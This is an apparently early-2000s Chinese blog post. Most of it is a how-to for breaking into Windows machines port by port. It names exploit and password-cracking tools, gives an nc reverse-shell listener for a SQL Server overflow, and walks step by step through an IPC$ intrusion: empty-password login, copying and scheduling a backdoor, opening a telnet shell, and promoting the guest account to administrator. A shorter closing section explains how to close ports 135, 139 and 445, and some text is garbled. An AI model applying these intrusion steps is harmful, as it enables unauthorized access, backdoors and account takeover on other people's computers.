各个端口入侵详解
1.135端口入侵??
可以用NT掃描器來掃描所要IP端? ?
掃出來用Recton2.5來開 3389或TELNET服務等等??
2.139端口入侵
著個端口主要是掃的弱口令,用掃端口的掃一段IP的139端口
在用X-SCAN來批量掃描查弱口令
3. 1433端口入侵? ?
scanport.exe 查有1433的機器? ?
SQLScanPas*.**e 進行字典暴破(字典是關(guān)鍵)
最后 SQLTool*.**e入侵??
對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口??
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
4. 4899端口入侵??
用4899過濾器.exe,掃描空口令的機器??
5. 3899的入侵??
對很早的機器,可以試試3389的溢出(win3389ex.exe)??
對2000的機器,可以試試字典暴破。(tscrack.exe)? ?
6. 80入侵??
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)??
可以利用SQL進行注入。(啊D的注入軟件)。? ?
7. serv-u入侵(21端口)
對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)? ?
對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)? ?
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)??
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼??
8. 554端口??
用real554.exe入侵。
J/'oW]6K!? ?
9. 6129端口? ?
用DameWare6129.exe入侵。
10. 系統(tǒng)漏洞? ?
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,??
進行溢出入侵。??
??
11. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
12. 其他入侵? ?
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。??
經(jīng)典IPC$入侵
1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"??
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名??
,輸入administrators,命令即可成功完成。
2. C:/>copy srv.exe //127.0.0.1/admin$??
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的??
c:/winnt/system32/,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去
3. C:/>net time //127.0.0.1??
查查時間,發(fā)現(xiàn)127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
? ?
4. C:/>at //127.0.0.1 11:05 srv.exe??
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊. ;*!
5. C:/>net time //127.0.0.1? ?
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備? ?
開始下面的命令。? ?
6. C:/>telnet 127.0.0.1 99??
這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的??
是SRV在對方計算機中為我們建立一個99端口的Shell。? ?
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打 算建立一個Telnet服務!這就要用到ntlm了? ?
??
7.C:/>copy ntlm.exe //127.0.0.1/admin$??
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。 ??
8. C:/WINNT/system32>ntlm? ?
輸入ntlm啟動(這里的C:/WINNT/system32>指的是對方計算機,運行ntlm其實是讓這??
個程序在對方計算機上運行)。當出現(xiàn)"DONE"的時候,就說明已經(jīng)啟動正常。然后使 用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作??
一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈) !??
為了以防萬一,我們再把guest激活加到管理組? ?
10. C:/>net user guest /active:yes??
將對方的Guest用戶激活
11. C:/>net user guest 1234 ??
將Guest的密碼改為1234,或者你要設定的密碼
12. C:/>net locaLGroup administrators guest /add??
將Guest變?yōu)锳dministrator
?
?
這次說的是關(guān)閉高危端口!
主要還是針對于前一段時間的抓及熱的幾個端口!
對我們個人的計算機產(chǎn)生危險的!也就是135,139,445
首先看139端口!
直接禁用這個netbios就可以了!
如果你是寬帶上網(wǎng)的話!
直接禁用貓的!
如果你是局域網(wǎng)的!
直接禁用網(wǎng)卡的!也就是本地連接的!
之后會提示重新啟動!
重啟一下就ok了!
下邊是445這個有很多的方法!
我就來個最實用的方法!
因為這個端口也是最危險的!
微軟就是會賺錢!給操作系統(tǒng)留下這么個隱患!
首先我們打開注冊表!
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters
依次找到這個項目!
在這里!
新建DWORD項的名字叫這個SMBDeviceEnabled
值為0就可以了!
最后就是135,這個有些麻煩了!
沒關(guān)系我們依舊可以關(guān)閉他!
首先打開防火墻!
我們啟用防火墻!
因為這個防火墻默認是禁用所有的!
所以我們135也是被禁用的!但是很多訪問網(wǎng)絡的程序就沒辦法訪問了亞!
呵呵!
沒關(guān)系!~只要我們在列外里邊把他添加進去就可以了!
如果你的電腦防火墻里如果有WMI這個項目的話
就在這里!一定要把他刪除或者把前邊的勾去掉!
而且防火墻沒事情的時候要啟用他!
WMI就是使用的135端口
如果有文件和打印機!
我建議你再把他取消!
因為這個是445的,為了安全嗎!
畢竟這些是不能保證百分之百的安全!
沒有做不到,只有想不到!
總結(jié)
- 上一篇: 常用的一些注入命令,方便一下大家哦
- 下一篇: 20个绝密电脑小技巧